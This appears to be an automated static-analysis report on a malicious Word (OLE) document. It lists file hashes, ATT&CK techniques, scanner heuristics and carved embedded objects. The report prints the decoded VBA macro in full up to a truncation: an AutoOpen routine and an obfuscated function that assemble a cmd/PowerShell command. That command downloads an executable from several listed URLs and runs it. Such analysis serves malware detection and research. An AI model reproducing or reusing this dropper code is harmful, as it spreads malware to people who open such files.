Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2f9ff572c6ce1e2a…

MALICIOUS

Office (OLE)

221.6 KB Created: 2018-09-13 20:12:00 Authoring application: Microsoft Office Word First seen: 2020-01-07
MD5: a763d9c5fcac9ef479e87290be1f3cb8 SHA-1: 75280b7ff62fe39599a99619f20e30eadd726210 SHA-256: 2f9ff572c6ce1e2a66fac5610e104d52936edaa7affea1e804fbcd2b762e4d54
302 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to execute a command that appears to download and run a second-stage payload, as suggested by the obfuscated string construction within the `YanqzO` function. The presence of multiple embedded OLE objects and a large slack space further supports the malicious nature of the file.

Heuristics 7

  • ClamAV: Doc.Malware.Valyria-6786371-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Valyria-6786371-0
  • Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGE
    A CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 226,944 bytes but its declared streams total only 53,897 bytes — 173,047 bytes (76%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4198 bytes
SHA-256: ddbe5d74b00c7f23bf5929159fd489fce5eeab2addbe3d9fcddcec08e0dd617e
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "GGOLVvIE"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On _
Error _
Resume _
Next
   Dim AWZrnr()
ReDim AWZrnr(2)
AWZrnr(0) = 271
AWZrnr(1) = 391205782

   Dim qpZoAB()
ReDim qpZoAB(3)
qpZoAB(0) = 1
qpZoAB(1) = 3
qpZoAB(2) = 2

   Dim LcDpDD()
ReDim LcDpDD(2)
LcDpDD(0) = 9
LcDpDD(1) = 295107707

   Dim PXPAIR()
ReDim PXPAIR(4)
PXPAIR(0) = 588
PXPAIR(1) = 27
PXPAIR(2) = 925
PXPAIR(3) = 8

   Dim aXqpjm()
ReDim aXqpjm(2)
aXqpjm(0) = 36
aXqpjm(1) = 5

Shell@ YanqzO + fzlGMvlij + bwmlcFlizZrE, Format(0)
   Dim NUZZzZ()
ReDim NUZZzZ(3)
NUZZzZ(0) = 528
NUZZzZ(1) = 75
NUZZzZ(2) = 7649

End Sub



Attribute VB_Name = "XYELbCbiVYbsX"
Function YanqzO()

On _
Error _
Resume _
Next
Dim zpMYCY()
ReDim zpMYCY(4)
zpMYCY(0) = 288860622
zpMYCY(1) = 736
zpMYCY(2) = 316137629
zpMYCY(3) = 394279374

LfVVPjIn = Format(Chr(18 + 11 + 11 + 8 + 51)) + "md /V/" + Format(Chr(12 + 7 + 7 + 5 + 36)) + Format(Chr(5 + 3 + 3 + 2 + 21)) + "^se^t ^8I=^      ^  ^" + " ^ ^    ^ ^  ^}^}^{^h" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "t" + "a" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "}^;ka^er^b;U^q" + "N$^ metI^-ekovnI^;)^" + "UqN$ ,vl^P^$(el^i^F^da" + "^olnwo^D.EVw${yrt^{)^f^j^z" + "^$ n^i v^lP$(h" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^aer^o^f" + "^;'^exe.^'+Va^o^$+'^\^'^+" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^i^l" + "^b^u^p^:vne^$^=UqN^$^;'7^"
Dim KYAwM()
ReDim KYAwM(5)
KYAwM(0) = 6
KYAwM(1) = 6780
KYAwM(2) = 28
KYAwM(3) = 43722461
KYAwM(4) = 532

   Dim hNmRU()
ReDim hNmRU(2)
hNmRU(0) = 475
hNmRU(1) = 108198689

   Dim pjKDzz()
ReDim pjKDzz(4)
pjKDzz(0) = 505
pjKDzz(1) = 1
pjKDzz(2) = 653
pjKDzz(3) = 29

   Dim MWIiU()
ReDim MWIiU(2)
MWIiU(0) = 5821
MWIiU(1) = 2312

   Dim uaIaGF()
ReDim uaIaGF(5)
uaIaGF(0) = 359
uaIaGF(1) = 575
uaIaGF(2) = 337
uaIaGF(3) = 128214803
uaIaGF(4) = 145901713

IOjQMaQ = "84^'^ " + "=^ V^a^o^$;)^'^@" + "^'(t^i^l^" + "p^S.^'d/" + "^s^ed^ul" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "n^i/ni^m^da^-"
Dim FJYfQ()
ReDim FJYfQ(3)
FJYfQ(0) = 951
FJYfQ(1) = 52
FJYfQ(2) = 3

   Dim UFFvN()
ReDim UFFvN(5)
UFFvN(0) = 5
UFFvN(1) = 80
UFFvN(2) = 705
UFFvN(3) = 105
UFFvN(4) = 7481

   Dim izqOH()
ReDim izqOH(4)
izqOH(0) = 1
izqOH(1) = 81
izqOH(2) = 6
izqOH(3) = 794

   Dim LZScO()
ReDim LZScO(4)
LZScO(0) = 176349511
LZScO(1) = 23
LZScO(2) = 1
LZScO(3) = 78

paSqjwVOT = "^p^w/mo" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.rem^a^git^l^u." + "^www//:pt^th^@" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^e^" + "d^w^WtPR/^m^o" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.er^a^" + "wt^f^oslage^l" + "^enilno//^:" + "p^t^t^h@O^Z4/m^o" + Format(Chr(18 + 11 + 11 + 8 + 51)) + ".ev^los" + "^-^irt.^ww^" + "w//^:^p^tth" + "^@" + Format(Chr(12 + 7 + 7 + 5 + 36)) + "/mo" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "^.i^k^so^d^er^e" + "ws" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "ire//^:ptth@Y^Li" + "^B^wxx/^mo"
Dim rkrCuA()
ReDim rkrCuA(4)
rkrCuA(0) = 48
rkrCuA(1) = 5
rkrCuA(2) = 6
rkrCuA(3) = 61

   Dim PiiaPC()
ReDim PiiaPC(3)
PiiaPC(0) = 326
PiiaPC(1) = 9265
PiiaPC(2) = 209856713

zsCHFprwK = Format(Chr(18 + 11 + 11 + 8 + 51)) + ".100gnai^ji^ak//:" + "^pt^t^h^'^=fj^z^$;" + "tn^eil" + Format(Chr(12 + 7 + 7 + 5 + 36)) + "beW.^teN^ t" + Format(Chr(18 + 11 + 11 + 8 + 51)) + "ej^bo^-wen" + "^=EVw^$^ l^le^hsrew" + "^o^p&&^f^or /^L %^" + "s ^in (^"
Dim DBCDcZ()
ReDim DBCDcZ(2)
DBCDcZ(0) = 465507000
DBCDcZ(1) = 253

QLHZknzozrV = "382,^-1^,0)d^o ^s" + "e^t ^q^7R" + "X=!^q^7RX!!^8I:~%^s,1!&&i^f %" + "^s l^s^s ^1 " + Format(Chr(18 + 11 + 11 + 8 + 51)) + "all %^q^7RX:^*q7" + "RX^!^=%" + Format(Chr(5 + 3 + 3 + 2 + 21)) + ""
YanqzO = LfVVPjIn + IOjQMaQ + paSqjwVOT + zsCHFprwK + QLHZknzozrV
   Dim jkLfh()
ReDim jkLfh(4)
jkLfh(0) = 7905
jkLfh(1) = 4647
jkLfh(2) = 45
jkLfh(3) = 1136

   Dim GQtwz()
ReDi
... (truncated)
embedded_office_off00012780.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x12780 151296 bytes
SHA-256: 124e1a847bb708882b9334dee1ffe7c99980343a30d7c9c860a932f677583d36
Detection
ClamAV: Doc.Malware.Valyria-6786371-0
Obfuscation or payload: unlikely
embedded_office_off00024f00.ole embedded-office Embedded OLE/CFB Office body inside ole container at offset 0x24F00 75648 bytes
SHA-256: 8b808398cdf8bcb4dd059f8ae734fe5239594105ad4faacd6af89cf2bff68f32
Detection
ClamAV: Doc.Malware.Valyria-6786371-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.